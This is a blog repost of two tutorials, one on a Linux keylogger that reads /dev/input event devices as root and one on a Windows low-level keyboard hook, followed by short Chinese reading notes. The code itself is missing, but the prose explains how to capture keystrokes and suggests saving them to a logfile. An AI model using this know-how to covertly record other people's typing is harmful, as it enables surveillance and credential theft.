Writing a Linux Keylogger in C

33 篇文章 0 订阅

原文: http://samvh.nl/security/writing-a-linux-keylogger-in-c/


Writing a Linux Keylogger in C

Today we are going to write a Linux keylogger in C. We can do this by reading from the keyboard device under /dev. This means you have to have root rights.

Warning: this keylogger is meant only for educational purposes. I’m not responsible for any damage made by this program.

Reading from the device

First of all, we need to know which /dev-ice we need to use, this is different for each keyboard. I know already that it is under /dev/input. In that folder we have multiple devices starting with “event”. We could open each device with something likecat  and look if something happens after hitting a key. But, this can be done much easier. In the file /proc/bus/input/devices are all eventX listed. So we can read this file with cat  and search for the keyboard. An item in the /proc/bus/input/devices file looks like this:

The thirth word after “Handlers=” is the eventX-device of the device. My keyboard is event3, so I will be using that in this blogpost. If we read from /dev/input/event3 (with root rights ;)), we will see a lot of scancodes.  In the C program, we will be translating those scancodes to ASCII.

 

The program

We need the following imports:

After that, we define the constant UK, so we don’t have to write “[Unknown]” everytime a scancode doesn’t have a key on the keyboard-layout:

Then we make a keyboard layout, like the following:

Also, we make a keyboard layout for whenever the capslock key is pressed and whenever the shift key is pressed:

Then we define a main function, with some variables and a while loop.

O_RDONLY means we can only read from the file. input_event is a struct defined in input.h:

 

In the while loop, we will read from fd and store it in ev. When the ev.type is equal to 1, two if statements will check if the key was pressed or released and print the key.

ev.code is the scancode in decimals.

The program will now work, but shift and capslock won’t make keys uppercase or something like. So, we check in the first if statement if the pressed key is capslock. If it is, we’ll check ifcaps_pressed is already 1, if so we set it to 0. Otherwise we set it to 1.  We also check if shift has been pressed, if that is the case, we setshift_pressed to 1. Whenever shift has been released, we set it to 0. The scancode for [RShift], [LShift] and [CapsLock] are 54, 42 and 58,respectively. Also each time when a key is released, we print a newline onto the screen. You can find the final code in my GitHub repository: https://github.com/samvhb/Linux-Keylogger.

Next

You can make a scancode-list, when CTRL is hold, so you can log keys like CTRL+C, CTRL+S. Also you can store the keys in a logfile.

If you have questions, suggestions or anything like that, make sure to comment :).

 

– Sam

 

 

Posted on August 29, 2015CategoriesSecurityTagsc, keylogger, linux,malware, programming, security, unix,virus




===================Window keylogger=======================

原文: http://www.haseeb-ahmed.com/2015/02/global-windows-hook-in-visual-c/

Using global windows hook in Visual C++

Using global windows hook in Visual C++

Since you are here, you probably know what is a Windows hook and what can it be used for. I say this because, this isn’t exactly a beginner topic. Nonetheless, lets get ourselves familiar with hooks before we get started. Here is how the MSDN documentation describes a Windows hook:

A hook is a mechanism by which an application can intercept events, such as messages, mouse actions, and keystrokes. A function that intercepts a particular type of event is known as a hook procedure.

For the sake of simplicity, you can think of hooks as Windows’ global events and hook procedures as your event handlers for them. Many might disagree with my analogy and i do agree that its not the best but still, it gets the job done.

Before we can implement a Windows hook, you need to make sure that you have at least some basic understanding of the C++ programming language. If you don’t, i would recommend you go and checkout this free course at the Microsoft Virtual Academy before you continue any further.

How-to implement Windows hook

Now that we have the brief introduction and prerequisites out of our way, we should start with the implementation of hooks using C++. I would be using Microsoft’s Visual Studio 2013 but this code should run in pretty much any C++ IDE. Also, I would only be implementing the WH_KEYBOARD_LL hook through which we can get the low-level keyboard input events. This is mainly due to two reasons:

  • WH_KEYBOARD_LL hook is easy to implement and understand.
  • Other types of hooks have almost a similar implementation.

Start off using an empty console project and add the following lines of code to your Source.cpp file.

We have included iostream and Windows.h files into our program. You probably know what iostream is for, Windows.h file has the code required to install and uninstall a Windows hook. Pragma pre-processor directive tells the compiler that the user32.lib file will be required as well.

While statement on the line #7 puts the program in a message loop and makes sure that the program stays alive. We need this because the hooks are uninstalled once you program exits so without this while statement, our program will immediately close after running.

Now, add the following lines of code just above the declaration of our program’s main method.

First, we declare and initialize a variable of the type HHOOK. This actually is a pointer that gets set once the hook has been installed. MyLowLevelKeyboardProc() is the event handler (or the hook procedure) that runs once the respected Windows’ global event (or hook) is triggered. CallNextHookEx() returns the next hook procedure in the queue, for execution. If you don’t do this, other application’s hook procedures queued after yours won’t work. This might cause other applications to behave irregularly. You can read in more detail about LowLevelKeyboardProc() and it’s arguments in the MSDN documentation.

We have done most of the work by now. The basic structure of our  C++ program is ready. We have defined the LowLevelKeyboardProc() hook procedure. Now all that is left is to install the hook so that we can start receiving our low-level keyboard events.

To do that, add the following code just above the while loop, into the main function of your program.

What this does is, it installs our MyLowLevelKeyBoardProc() into the WH_KEYBOARD_LL hook and return a pointer to hHook. If SetWindowsHookEx() fails due to some reason, hHook is null and the error is displayed in the console window.

Your complete program should now look something like this.

That’s it. Run your program (Ctrl + F5), click on the task-bar and press some keys from the keyboard. You’ll should see something like the screenshot below.

Using global windows hook in Visual C++

In my experience, those are all the basics you need to know about how to implement hooks in C++. Still, if you have any further questions please feel free to ask. I’ll try my level best to answer them.

You can download the final source code from my Codeplex project. Meanwhile, also do checkout some more recommend resources given below.


##############阅读笔记################

Linux上实现keylogger原理是读取设备文件 /dev/xxxx

Window上通过Hooks

通过监听系统范围的键盘时间,或鼠标点击时间,可以实现一些有意思的事情。

比如用户双击了一个*.doc文件,我们可以先对这个文件进行一些处理,再给用户打开。


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值